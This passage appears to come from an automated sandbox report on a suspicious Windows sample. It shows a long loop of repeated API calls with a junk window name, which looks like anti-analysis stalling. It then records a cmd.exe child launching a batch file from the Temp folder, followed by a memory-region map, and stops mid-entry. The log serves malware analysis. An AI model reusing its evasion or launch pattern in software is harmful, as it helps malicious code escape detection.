[0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x19c3f000" os_pid = "0xcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1125 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1126 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1127 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1128 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1129 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1130 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1131 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1132 start_va = 0x4ac10000 end_va = 0x4ac5bfff entry_point = 0x4ac10000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1133 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1134 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1135 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1136 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1137 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1138 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1139 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1141 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1142 start_va = 0x580000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1143 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1144 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1145 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1146 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1147 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1148 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1149 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1150 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1151 start_va = 0x75760000 end_va = 0x75766fff entry_point = 0x75760000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1152 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1153 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1154 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1155 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1156 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1157 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1158 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1159 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1160 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1161 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1162 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1163 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1164 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1165 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1166 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1167 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1168 start_va = 0x880000 end_va = 0xa07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1169 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = 